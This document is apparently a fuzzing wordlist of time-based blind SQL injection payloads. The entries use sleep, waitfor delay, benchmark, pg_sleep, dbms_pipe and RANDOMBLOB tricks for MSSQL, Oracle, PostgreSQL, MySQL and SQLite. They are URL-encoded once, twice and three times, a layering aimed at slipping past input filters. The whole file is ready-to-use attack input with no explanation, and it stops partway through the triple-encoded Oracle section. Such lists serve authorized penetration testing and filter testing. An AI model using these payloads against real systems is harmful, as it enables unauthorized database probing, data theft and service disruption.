x%27AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
x%27AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29
x%27AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29--
x%27AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29%23
x%27SLEEP%285%29%23
x%27SLEEP%285%29--
x%27SLEEP%285%29%3D%22
x%27SLEEP%285%29%3D%27
x%27or%20SLEEP%285%29
x%27or%20SLEEP%285%29%23
x%27or%20SLEEP%285%29--
x%27or%20SLEEP%285%29%3D%22
x%27or%20SLEEP%285%29%3D%27
x%27waitfor%20delay%20%2700%3A00%3A05%27
x%27waitfor%20delay%20%2700%3A00%3A05%27--
x%27waitfor%20delay%20%2700%3A00%3A05%27%23
x%27benchmark%2850000000%2CMD5%281%29%29
x%27benchmark%2850000000%2CMD5%281%29%29--
x%27benchmark%2850000000%2CMD5%281%29%29%23
x%27or%20benchmark%2850000000%2CMD5%281%29%29
x%27or%20benchmark%2850000000%2CMD5%281%29%29--
x%27or%20benchmark%2850000000%2CMD5%281%29%29%23
x%27pg_SLEEP%285%29
x%27pg_SLEEP%285%29--
x%27pg_SLEEP%285%29%23
x%27or%20pg_SLEEP%285%29
x%27or%20pg_SLEEP%285%29--
x%27or%20pg_SLEEP%285%29%23
x%27%27%5C%22
x%27AnD%20SLEEP%285%29
x%27AnD%20SLEEP%285%29--
x%27AnD%20SLEEP%285%29%23
x%27%26%26SLEEP%285%29
x%27%26%26SLEEP%285%29--
x%27%26%26SLEEP%285%29%23
x%27%27%20AnD%20SLEEP%285%29%20ANd%20%271
x%27%27%26%26SLEEP%285%29%26%26%271
x%27ORDER%20BY%20SLEEP%285%29
x%27ORDER%20BY%20SLEEP%285%29--
x%27ORDER%20BY%20SLEEP%285%29%23
x%27%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29
x%27%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29%23
x%27%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29--
x%27%2Bbenchmark%283200%2CSHA1%281%29%29%2B%27
x%27%2B%20SLEEP%2810%29%20%2B%20%27
x%27RANDOMBLOB%28500000000/2%29
x%27AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
x%27OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
x%27RANDOMBLOB%281000000000/2%29
x%27AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
x%27OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
x%27SLEEP%281%29/%2A%27%20or%20SLEEP%281%29%20or%20%27%22%20or%20SLEEP%281%29%20or%20%22%2A/


#Double URL encoded
%2523MSSQL
%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
%2527%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
%2527%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
x%2522%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
x%2522%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
x%2522%2527%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
x%2522%2527%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
x%2522%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
x%2527%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
x%2527%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
x%2527%2527%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
x%2527%2527%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--
x%2527%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A10%2527--

%2523Oracle
AND%2520%255BRANDNUM%255D%253DDBMS_PIPE.RECEIVE_MESSAGE%2528%2527%255BRANDSTR%255D%2527%252C%255BSLEEPTIME%255D%2529--
AND%2520%255BRANDNUM%255D%253DDBMS_PIPE.RECEIVE_MESSAGE%2528%2527%255BRANDSTR%255D%2527%252C%255BSLEEPTIME%255D%2529/%252A%252A/
dbms_pipe.receive_message%2528%2528%2527a%2527%2529%252C10%2529/%252A%252A/
dbms_pipe.receive_message%2528%2528%2527a%2527%2529%252C10%2529%2523
x%2522AND%2520%255BRANDNUM%255D%253DDBMS_PIPE.RECEIVE_MESSAGE%2528%2527%255BRANDSTR%255D%2527%252C%255BSLEEPTIME%255D%2529--
x%2522AND%2520%255BRANDNUM%255D%253DDBMS_PIPE.RECEIVE_MESSAGE%2528%2527%255BRANDSTR%255D%2527%252C%255BSLEEPTIME%255D%2529/%252A%252A/
x%2522dbms_pipe.receive_message%2528%2528%2527a%2527%2529%252C10%2529/%252A%252A/
x%2522dbms_pipe.receive_message%2528%2528%2527a%2527%2529%252C10%2529%2523
x%2527AND%2520%255BRANDNUM%255D%253DDBMS_PIPE.RECEIVE_MESSAGE%2528%2527%255BRANDSTR%255D%2527%252C%255BSLEEPTIME%255D%2529--
x%2527AND%2520%255BRANDNUM%255D%253DDBMS_PIPE.RECEIVE_MESSAGE%2528%2527%255BRANDSTR%255D%2527%252C%255BSLEEPTIME%255D%2529/%252A%252A/
x%2527dbms_pipe.receive_message%2528%2528%2527a%2527%2529%252C10%2529/%252A%252A/
x%2527dbms_pipe.receive_message%2528%2528%2527a%2527%2529%252C10%2529%2523

%2523PostGreSQL
x%2527AND%2520%255BRANDNUM%255D%253D%2528SELECT%2520%255BRANDNUM%255D%2520FROM%2520PG_SLEEP%2528%255BSLEEPTIME%255D%2529%2529/%252A%252A/
x%2527AND%2520%255BRANDNUM%255D%253D%2528SELECT%2520COUNT%2528%252A%2529%2520FROM%2520GENERATE_SERIES%25281%252C%255BSLEEPTIME%255D000000%2529%2529%2523
x%2522AND%2520%255BRANDNUM%255D%253D%2528SELECT%2520%255BRANDNUM%255D%2520FROM%2520PG_SLEEP%2528%255BSLEEPTIME%255D%2529%2529/%252A%252A/
x%2522AND%2520%255BRANDNUM%255D%253D%2528SELECT%2520COUNT%2528%252A%2529%2520FROM%2520GENERATE_SERIES%25281%252C%255BSLEEPTIME%255D000000%2529%2529%2523
AND%2520%255BRANDNUM%255D%253D%2528SELECT%2520%255BRANDNUM%255D%2520FROM%2520PG_SLEEP%2528%255BSLEEPTIME%255D%2529%2529/%252A%252A/
AND%2520%255BRANDNUM%255D%253D%2528SELECT%2520COUNT%2528%252A%2529%2520FROM%2520GENERATE_SERIES%25281%252C%255BSLEEPTIME%255D000000%2529%2529%2523

%2523Extra
x%2527XOR%2528if%2528now%2528%2529%253Dsysdate%2528%2529%252Csleep%25286%2529%252C0%2529%2529XOR%2527Z
x%2522XOR%2528if%2528now%2528%2529%253Dsysdate%2528%2529%252Csleep%25286%2529%252C0%2529%2529XOR%2527Z

%2523Generic%2520Time%2520Based
sleep%25285%2529%2523
1%2520or%2520sleep%25285%2529%2523
%2522%2520or%2520sleep%25285%2529%2523
%2527%2520or%2520sleep%25285%2529%2523
%2522%2520or%2520sleep%25285%2529%253D%2522
%2527%2520or%2520sleep%25285%2529%253D%2527
1%2529%2520or%2520sleep%25285%2529%2523
%2522%2529%2520or%2520sleep%25285%2529%253D%2522
%2527%2529%2520or%2520sleep%25285%2529%253D%2527
1%2529%2529%2520or%2520sleep%25285%2529%2523
%2522%2529%2529%2520or%2520sleep%25285%2529%253D%2522
%2527%2529%2529%2520or%2520sleep%25285%2529%253D%2527
%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
%2527%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
%2522%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
%2527%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
%2522%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
%2527%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
%2522%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
benchmark%252810000000%252CMD5%25281%2529%2529%2523
1%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
%2522%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
%2527%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
1%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
%2522%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
%2527%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
1%2529%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
%2522%2529%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
%2527%2529%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
pg_sleep%25285%2529--
1%2520or%2520pg_sleep%25285%2529--
%2522%2520or%2520pg_sleep%25285%2529--
%2527%2520or%2520pg_sleep%25285%2529--
1%2529%2520or%2520pg_sleep%25285%2529--
%2522%2529%2520or%2520pg_sleep%25285%2529--
%2527%2529%2520or%2520pg_sleep%25285%2529--
1%2529%2529%2520or%2520pg_sleep%25285%2529--
%2522%2529%2529%2520or%2520pg_sleep%25285%2529--
%2527%2529%2529%2520or%2520pg_sleep%25285%2529--
AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529bAKL%2529%2520AND%2520%2527vRxe%2527%253D%2527vRxe
AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529YjoC%2529%2520AND%2520%2527%2525%2527%253D%2527
AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529nQIP%2529
AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529nQIP%2529--
AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529nQIP%2529%2523
SLEEP%25285%2529%2523
SLEEP%25285%2529--
SLEEP%25285%2529%253D%2522
SLEEP%25285%2529%253D%2527
or%2520SLEEP%25285%2529
or%2520SLEEP%25285%2529%2523
or%2520SLEEP%25285%2529--
or%2520SLEEP%25285%2529%253D%2522
or%2520SLEEP%25285%2529%253D%2527
waitfor%2520delay%2520%252700%253A00%253A05%2527
waitfor%2520delay%2520%252700%253A00%253A05%2527--
waitfor%2520delay%2520%252700%253A00%253A05%2527%2523
benchmark%252850000000%252CMD5%25281%2529%2529
benchmark%252850000000%252CMD5%25281%2529%2529--
benchmark%252850000000%252CMD5%25281%2529%2529%2523
or%2520benchmark%252850000000%252CMD5%25281%2529%2529
or%2520benchmark%252850000000%252CMD5%25281%2529%2529--
or%2520benchmark%252850000000%252CMD5%25281%2529%2529%2523
pg_SLEEP%25285%2529
pg_SLEEP%25285%2529--
pg_SLEEP%25285%2529%2523
or%2520pg_SLEEP%25285%2529
or%2520pg_SLEEP%25285%2529--
or%2520pg_SLEEP%25285%2529%2523
%2527%255C%2522
AnD%2520SLEEP%25285%2529
AnD%2520SLEEP%25285%2529--
AnD%2520SLEEP%25285%2529%2523
%2526%2526SLEEP%25285%2529
%2526%2526SLEEP%25285%2529--
%2526%2526SLEEP%25285%2529%2523
%2527%2520AnD%2520SLEEP%25285%2529%2520ANd%2520%25271
%2527%2526%2526SLEEP%25285%2529%2526%2526%25271
ORDER%2520BY%2520SLEEP%25285%2529
ORDER%2520BY%2520SLEEP%25285%2529--
ORDER%2520BY%2520SLEEP%25285%2529%2523
%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529ecMj%2529
%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529ecMj%2529%2523
%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529ecMj%2529--
%252Bbenchmark%25283200%252CSHA1%25281%2529%2529%252B%2527
%252B%2520SLEEP%252810%2529%2520%252B%2520%2527
RANDOMBLOB%2528500000000/2%2529
AND%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%2528500000000/2%2529%2529%2529%2529
OR%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%2528500000000/2%2529%2529%2529%2529
RANDOMBLOB%25281000000000/2%2529
AND%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%25281000000000/2%2529%2529%2529%2529
OR%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%25281000000000/2%2529%2529%2529%2529
SLEEP%25281%2529/%252A%2527%2520or%2520SLEEP%25281%2529%2520or%2520%2527%2522%2520or%2520SLEEP%25281%2529%2520or%2520%2522%252A/

x%2522sleep%25285%2529%2523
x%25221%2520or%2520sleep%25285%2529%2523
x%2522%2522%2520or%2520sleep%25285%2529%2523
x%2522%2527%2520or%2520sleep%25285%2529%2523
x%2522%2522%2520or%2520sleep%25285%2529%253D%2522
x%2522%2527%2520or%2520sleep%25285%2529%253D%2527
x%25221%2529%2520or%2520sleep%25285%2529%2523
x%2522%2522%2529%2520or%2520sleep%25285%2529%253D%2522
x%2522%2527%2529%2520or%2520sleep%25285%2529%253D%2527
x%25221%2529%2529%2520or%2520sleep%25285%2529%2523
x%2522%2522%2529%2529%2520or%2520sleep%25285%2529%253D%2522
x%2522%2527%2529%2529%2520or%2520sleep%25285%2529%253D%2527
x%2522%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2522%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2522%2527%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2522%2522%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2522%2527%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2522%2522%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2522%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2522%2527%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2522%2522%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2522benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%25221%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2522%2522%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2522%2527%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%25221%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2522%2522%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2522%2527%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%25221%2529%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2522%2522%2529%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2522%2527%2529%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2522pg_sleep%25285%2529--
x%25221%2520or%2520pg_sleep%25285%2529--
x%2522%2522%2520or%2520pg_sleep%25285%2529--
x%2522%2527%2520or%2520pg_sleep%25285%2529--
x%25221%2529%2520or%2520pg_sleep%25285%2529--
x%2522%2522%2529%2520or%2520pg_sleep%25285%2529--
x%2522%2527%2529%2520or%2520pg_sleep%25285%2529--
x%25221%2529%2529%2520or%2520pg_sleep%25285%2529--
x%2522%2522%2529%2529%2520or%2520pg_sleep%25285%2529--
x%2522%2527%2529%2529%2520or%2520pg_sleep%25285%2529--
x%2522AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529bAKL%2529%2520AND%2520%2527vRxe%2527%253D%2527vRxe
x%2522AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529YjoC%2529%2520AND%2520%2527%2525%2527%253D%2527
x%2522AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529nQIP%2529
x%2522AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529nQIP%2529--
x%2522AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529nQIP%2529%2523
x%2522SLEEP%25285%2529%2523
x%2522SLEEP%25285%2529--
x%2522SLEEP%25285%2529%253D%2522
x%2522SLEEP%25285%2529%253D%2527
x%2522or%2520SLEEP%25285%2529
x%2522or%2520SLEEP%25285%2529%2523
x%2522or%2520SLEEP%25285%2529--
x%2522or%2520SLEEP%25285%2529%253D%2522
x%2522or%2520SLEEP%25285%2529%253D%2527
x%2522waitfor%2520delay%2520%252700%253A00%253A05%2527
x%2522waitfor%2520delay%2520%252700%253A00%253A05%2527--
x%2522waitfor%2520delay%2520%252700%253A00%253A05%2527%2523
x%2522benchmark%252850000000%252CMD5%25281%2529%2529
x%2522benchmark%252850000000%252CMD5%25281%2529%2529--
x%2522benchmark%252850000000%252CMD5%25281%2529%2529%2523
x%2522or%2520benchmark%252850000000%252CMD5%25281%2529%2529
x%2522or%2520benchmark%252850000000%252CMD5%25281%2529%2529--
x%2522or%2520benchmark%252850000000%252CMD5%25281%2529%2529%2523
x%2522pg_SLEEP%25285%2529
x%2522pg_SLEEP%25285%2529--
x%2522pg_SLEEP%25285%2529%2523
x%2522or%2520pg_SLEEP%25285%2529
x%2522or%2520pg_SLEEP%25285%2529--
x%2522or%2520pg_SLEEP%25285%2529%2523
x%2522%2527%255C%2522
x%2522AnD%2520SLEEP%25285%2529
x%2522AnD%2520SLEEP%25285%2529--
x%2522AnD%2520SLEEP%25285%2529%2523
x%2522%2526%2526SLEEP%25285%2529
x%2522%2526%2526SLEEP%25285%2529--
x%2522%2526%2526SLEEP%25285%2529%2523
x%2522%2527%2520AnD%2520SLEEP%25285%2529%2520ANd%2520%25271
x%2522%2527%2526%2526SLEEP%25285%2529%2526%2526%25271
x%2522ORDER%2520BY%2520SLEEP%25285%2529
x%2522ORDER%2520BY%2520SLEEP%25285%2529--
x%2522ORDER%2520BY%2520SLEEP%25285%2529%2523
x%2522%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529ecMj%2529
x%2522%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529ecMj%2529%2523
x%2522%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529ecMj%2529--
x%2522%252Bbenchmark%25283200%252CSHA1%25281%2529%2529%252B%2527
x%2522%252B%2520SLEEP%252810%2529%2520%252B%2520%2527
x%2522RANDOMBLOB%2528500000000/2%2529
x%2522AND%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%2528500000000/2%2529%2529%2529%2529
x%2522OR%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%2528500000000/2%2529%2529%2529%2529
x%2522RANDOMBLOB%25281000000000/2%2529
x%2522AND%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%25281000000000/2%2529%2529%2529%2529
x%2522OR%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%25281000000000/2%2529%2529%2529%2529
x%2522SLEEP%25281%2529/%252A%2527%2520or%2520SLEEP%25281%2529%2520or%2520%2527%2522%2520or%2520SLEEP%25281%2529%2520or%2520%2522%252A/

x%2527sleep%25285%2529%2523
x%25271%2520or%2520sleep%25285%2529%2523
x%2527%2522%2520or%2520sleep%25285%2529%2523
x%2527%2527%2520or%2520sleep%25285%2529%2523
x%2527%2522%2520or%2520sleep%25285%2529%253D%2522
x%2527%2527%2520or%2520sleep%25285%2529%253D%2527
x%25271%2529%2520or%2520sleep%25285%2529%2523
x%2527%2522%2529%2520or%2520sleep%25285%2529%253D%2522
x%2527%2527%2529%2520or%2520sleep%25285%2529%253D%2527
x%25271%2529%2529%2520or%2520sleep%25285%2529%2523
x%2527%2522%2529%2529%2520or%2520sleep%25285%2529%253D%2522
x%2527%2527%2529%2529%2520or%2520sleep%25285%2529%253D%2527
x%2527%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2527%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2527%2527%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2527%2522%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2527%2527%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2527%2522%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2527%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2527%2527%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2527%2522%2529%2529%253Bwaitfor%2520delay%2520%25270%253A0%253A5%2527--
x%2527benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%25271%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2527%2522%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2527%2527%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%25271%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2527%2522%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2527%2527%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%25271%2529%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2527%2522%2529%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2527%2527%2529%2529%2520or%2520benchmark%252810000000%252CMD5%25281%2529%2529%2523
x%2527pg_sleep%25285%2529--
x%25271%2520or%2520pg_sleep%25285%2529--
x%2527%2522%2520or%2520pg_sleep%25285%2529--
x%2527%2527%2520or%2520pg_sleep%25285%2529--
x%25271%2529%2520or%2520pg_sleep%25285%2529--
x%2527%2522%2529%2520or%2520pg_sleep%25285%2529--
x%2527%2527%2529%2520or%2520pg_sleep%25285%2529--
x%25271%2529%2529%2520or%2520pg_sleep%25285%2529--
x%2527%2522%2529%2529%2520or%2520pg_sleep%25285%2529--
x%2527%2527%2529%2529%2520or%2520pg_sleep%25285%2529--
x%2527AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529bAKL%2529%2520AND%2520%2527vRxe%2527%253D%2527vRxe
x%2527AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529YjoC%2529%2520AND%2520%2527%2525%2527%253D%2527
x%2527AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529nQIP%2529
x%2527AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529nQIP%2529--
x%2527AND%2520%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529nQIP%2529%2523
x%2527SLEEP%25285%2529%2523
x%2527SLEEP%25285%2529--
x%2527SLEEP%25285%2529%253D%2522
x%2527SLEEP%25285%2529%253D%2527
x%2527or%2520SLEEP%25285%2529
x%2527or%2520SLEEP%25285%2529%2523
x%2527or%2520SLEEP%25285%2529--
x%2527or%2520SLEEP%25285%2529%253D%2522
x%2527or%2520SLEEP%25285%2529%253D%2527
x%2527waitfor%2520delay%2520%252700%253A00%253A05%2527
x%2527waitfor%2520delay%2520%252700%253A00%253A05%2527--
x%2527waitfor%2520delay%2520%252700%253A00%253A05%2527%2523
x%2527benchmark%252850000000%252CMD5%25281%2529%2529
x%2527benchmark%252850000000%252CMD5%25281%2529%2529--
x%2527benchmark%252850000000%252CMD5%25281%2529%2529%2523
x%2527or%2520benchmark%252850000000%252CMD5%25281%2529%2529
x%2527or%2520benchmark%252850000000%252CMD5%25281%2529%2529--
x%2527or%2520benchmark%252850000000%252CMD5%25281%2529%2529%2523
x%2527pg_SLEEP%25285%2529
x%2527pg_SLEEP%25285%2529--
x%2527pg_SLEEP%25285%2529%2523
x%2527or%2520pg_SLEEP%25285%2529
x%2527or%2520pg_SLEEP%25285%2529--
x%2527or%2520pg_SLEEP%25285%2529%2523
x%2527%2527%255C%2522
x%2527AnD%2520SLEEP%25285%2529
x%2527AnD%2520SLEEP%25285%2529--
x%2527AnD%2520SLEEP%25285%2529%2523
x%2527%2526%2526SLEEP%25285%2529
x%2527%2526%2526SLEEP%25285%2529--
x%2527%2526%2526SLEEP%25285%2529%2523
x%2527%2527%2520AnD%2520SLEEP%25285%2529%2520ANd%2520%25271
x%2527%2527%2526%2526SLEEP%25285%2529%2526%2526%25271
x%2527ORDER%2520BY%2520SLEEP%25285%2529
x%2527ORDER%2520BY%2520SLEEP%25285%2529--
x%2527ORDER%2520BY%2520SLEEP%25285%2529%2523
x%2527%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529ecMj%2529
x%2527%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529ecMj%2529%2523
x%2527%2528SELECT%2520%252A%2520FROM%2520%2528SELECT%2528SLEEP%25285%2529%2529%2529ecMj%2529--
x%2527%252Bbenchmark%25283200%252CSHA1%25281%2529%2529%252B%2527
x%2527%252B%2520SLEEP%252810%2529%2520%252B%2520%2527
x%2527RANDOMBLOB%2528500000000/2%2529
x%2527AND%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%2528500000000/2%2529%2529%2529%2529
x%2527OR%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%2528500000000/2%2529%2529%2529%2529
x%2527RANDOMBLOB%25281000000000/2%2529
x%2527AND%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%25281000000000/2%2529%2529%2529%2529
x%2527OR%25202947%253DLIKE%2528%2527ABCDEFG%2527%252CUPPER%2528HEX%2528RANDOMBLOB%25281000000000/2%2529%2529%2529%2529
x%2527SLEEP%25281%2529/%252A%2527%2520or%2520SLEEP%25281%2529%2520or%2520%2527%2522%2520or%2520SLEEP%25281%2529%2520or%2520%2522%252A/

#Triple URL encoded
#MSSQL
%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
%252527%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
%252527%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
x%252522%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
x%252522%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
x%252522%252527%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
x%252522%252527%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
x%252522%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
x%252527%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
x%252527%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
x%252527%252527%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
x%252527%252527%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--
x%252527%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A10%252527--

#Oracle
AND%252520%25255BRANDNUM%25255D%25253DDBMS_PIPE.RECEIVE_MESSAGE%252528%252527%25255BRANDSTR%25255D%252527%25252C%25255BSLEEPTIME%25255D%252529--
AND%252520%25255BRANDNUM%25255D%25253DDBMS_PIPE.RECEIVE_MESSAGE%252528%252527%25255BRANDSTR%25255D%252527%25252C%25255BSLEEPTIME%25255D%252529/%25252A%25252A/
dbms_pipe.receive_message%252528%252528%252527a%252527%252529%25252C10%252529/%25252A%25252A/
dbms_pipe.receive_message%252528%252528%252527a%252527%252529%25252C10%252529%252523
x%252522AND%252520%25255BRANDNUM%25255D%25253DDBMS_PIPE.RECEIVE_MESSAGE%252528%252527%25255BRANDSTR%25255D%252527%25252C%25255BSLEEPTIME%25255D%252529--
x%252522AND%252520%25255BRANDNUM%25255D%25253DDBMS_PIPE.RECEIVE_MESSAGE%252528%252527%25255BRANDSTR%25255D%252527%25252C%25255BSLEEPTIME%25255D%252529/%25252A%25252A/
